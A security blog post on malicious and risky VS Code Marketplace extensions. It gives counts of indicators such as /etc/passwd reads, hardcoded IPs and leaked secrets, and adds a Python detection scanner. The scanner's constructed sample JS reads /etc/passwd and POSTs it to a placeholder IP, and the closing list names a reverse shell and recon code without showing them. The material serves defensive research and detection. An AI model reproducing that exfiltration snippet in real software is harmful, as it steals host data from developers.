2/6 | Exposing Malicious Extensions: Shocking Statistics from the VS Code Marketplace

Amit Assaraf
5 min read · Jun 2, 2024


In the previous blog post “1/6 | How We Hacked Multi-Billion Dollar Companies in 30 Minutes Using a Fake VSCode Extension”, we told the story of how, within 30 minutes of work, we created a Visual Studio Code extension that was later confirmed to be installed inside multiple companies with multi-billion dollar market caps, including one of the biggest security companies in the world, as well as in a certain country’s justice court network.

Realizing the significance of our experiment, we decided to dive deeper into the current state of malicious extensions in the VSCode marketplace.

Visual Studio Code Marketplace Stats

Let’s get some basics out of the way: the VSCode Marketplace hosts around 60,000 extensions from roughly 45,000 different publishers, of which only 1,800 are verified (we’ll touch on this later).

While the marketplace hosts 60,000 extensions, it has a total of 3.3 billion installs, with the average developer installing 40 extensions in his IDE.

Across those 60,000 extensions, the average install count per extension is ~55,000, while the median sits at only 500 installs.

In the last year alone (2023), the VSCode marketplace grew by 25% in the number of extensions it hosts.

While these stats are great for Microsoft overall, they are a worry for organizations: the popularity of extensions is growing massively, and the growing number of extensions presents more and more opportunities for threat actors to blend into the crowd and infiltrate organizations.

So, Visual Studio Code is growing and is virtually everywhere, but why is it a security risk?

Visual Studio Code is the first IDE (Integrated Development Environment) that adopted the “bare-bones, compose your own IDE” approach. Instead of offering a massive, feature-heavy IDE that tries to solve all the problems for all developers, VSCode is a platform that anyone can extend, allowing each developer to pick and choose the tools he needs to complete his work. This new approach was a huge success, quickly surpassing the then-market leader JetBrains in monthly active users.

By nature, this meant that Microsoft needed to create a marketplace where fellow developers can share the tools they use to make their work more efficient: the VSCode marketplace. This is where security risks enter the picture.

The IDE is one of the most sensitive security chokepoints in an organization, having access to the organizational codebase, version control, and often secrets and keys to the production environment. On top of that, IDEs are often highly privileged: they execute code and actions on the host machine that require admin-level permissions.

Installing an extension therefore means giving the extension publisher full access to the host environment.

Extensions in Visual Studio Code are not sandboxed: they can access anything inside the IDE and execute anything on the host machine without the developer getting any feedback. I discuss these issues in more depth in the next blog post in the series, linked below.

Alright, enough details and background, what did we find?

Allow me to introduce you to the wonderful world of malicious and highly risky extensions we found, which are currently (Jun 2024) hosted on the VSCode marketplace.

Let’s talk numbers. In our initial research we found:

1,283 extensions that include known malicious dependencies packaged in them, with a combined total of 229 million installs (based on Google OSV Scanner).

87 extensions that attempt to read the /etc/passwd file on the host system.

8,161 extensions that communicate with a hardcoded IP address from JS code.

1,452 extensions that run an unknown executable binary or DLL on the host machine.

267 extensions that have verified hardcoded secrets embedded in them.

145 extensions whose code and resources were flagged with high confidence by VirusTotal.

2,304 extensions that list another publisher’s GitHub repo as their official repository, implying copycat extensions.

Got a shiny new AI policy in your organization? 783 extensions were found to use third-party AI models as part of their functionality.

Edit for clarification: It is important to mention that none of these indicators guarantee that the extensions are malicious; in fact, they most likely are not. These indicators are here to help show organizations what they are facing. Each organization may tweak these numbers and indicators to its own risk appetite and decide what is right for itself. We have no goal of calling innocent extensions malicious, or the other way around.
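As an added example, not part of the original post or of any tool it mentions, here is a small Python triage script that checks an unpacked extension for the indicator categories listed above: /etc/passwd reads, hardcoded IPs, spawning of binaries or DLLs, hardcoded secrets, and a publisher vs. GitHub-owner mismatch as a copycat heuristic. The regexes, the mismatch heuristic and the sample manifest and JS are constructed assumptions, and they flag risk, not malice.

```python
import json
import re
from pathlib import Path
# Indicator patterns for the categories listed above. They are constructed
# heuristics for triage, not proof of malice; tune them to your risk appetite.
INDICATORS = {
    "reads_etc_passwd": re.compile(r"/etc/passwd"),
    "hardcoded_ip": re.compile(r"(?<![\w.])(?:\d{1,3}\.){3}\d{1,3}(?![\w.])"),
    "spawns_binary": re.compile(r"child_process|\bspawn\(|\bexecFile?\(|\.exe\b|\.dll\b"),
    "hardcoded_secret": re.compile(r"(?i)(api[_-]?key|secret|token)\s*[:=]\s*['\"][A-Za-z0-9_\-]{16,}"),
}

def scan_js(source: str) -> dict:
    """Map each triggered indicator to the 1-based line numbers that hit it."""
    hits: dict = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def repo_owner_mismatch(manifest: dict) -> bool:
    """Copycat heuristic: listed GitHub repo owner differs from the publisher (legit mismatches exist)."""
    repo = manifest.get("repository")
    url = repo.get("url", "") if isinstance(repo, dict) else (repo or "")
    match = re.search(r"github\.com[/:]([^/]+)/", url)
    publisher = str(manifest.get("publisher", "")).lower()
    return bool(match) and match.group(1).lower() != publisher

def scan_extension(ext_dir: Path) -> dict:
    """Scan an unpacked .vsix directory: manifest heuristic plus every JS file."""
    manifest = json.loads((ext_dir / "package.json").read_text())
    report = {"copycat_repo": repo_owner_mismatch(manifest), "files": {}}
    for js in ext_dir.rglob("*.js"):  # node_modules included on purpose (bundled deps)
        hits = scan_js(js.read_text(errors="ignore"))
        if hits:
            report["files"][str(js.relative_to(ext_dir))] = hits
    return report

# Constructed sample: a fake "beautifier" extension showing several indicators at once.
SAMPLE_MANIFEST = {"name": "pretty-beautify", "publisher": "acme-tools",
                   "repository": {"type": "git", "url": "https://github.com/prettier/prettier.git"}}
SAMPLE_JS = """\
const cp = require('child_process');
const fs = require('fs');
const users = fs.readFileSync('/etc/passwd', 'utf8');
fetch('http://203.0.113.10/collect', { method: 'POST', body: users });
const apiKey = "sk_live_abcdefghijklmnop1234";
"""
```

Run `scan_extension(Path("unpacked-extension"))` on a directory produced by unzipping a .vsix; `scan_js(SAMPLE_JS)` and `repo_owner_mismatch(SAMPLE_MANIFEST)` show the expected hits on the constructed sample.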

Even if the actual number of malicious extensions is only 5% of our initial numbers, we are in really bad shape. Not to mention that highly risky, though not yet malicious, extensions are also a big risk for organizations, since malicious code can always be introduced through the security design flaws I describe in the next blog post. And there is much more: I’ve attached amazing code snippets of malicious and risky extensions that we found during our research at the end of this blog post; they have all been reported to Microsoft.

As you can tell from the numbers, there is a plethora of extensions on the Visual Studio Code marketplace that pose risks to organizations. VSCode extensions are an abused and exposed attack vertical, with zero visibility, high impact, and high risk. This issue poses a direct threat to organizations and deserves the security community’s attention.

After completing this research and the experiment from the previous blog post, we decided to write a letter to Microsoft addressing the immense security design flaws in extensions and in the VSCode marketplace that enable this attack vertical. Our next blog post, on the immensely flawed Marketplace, is out now: 3/6 | A Letter to Microsoft: Uncovering Design Flaws of Visual Studio Code Extensions.

Edit: We’ve released our free community tool to help solve this problem; check out ExtensionTotal.

Malicious and Risky Extensions Hall of Fame

Below are a few interesting malicious code snippets, live (Jun 2024) on the VSCode marketplace, that we found during our research:

A reverse shell found inside an extension claiming to be a code beautifier
A snippet that runs “whoami” on the host and sends it to a hardcoded IP
Code that sends the hostname ip to an obscure server
Piece of code that seems to do reconnaissance on the host

We will add more and update this list as we find clearly malicious extensions.
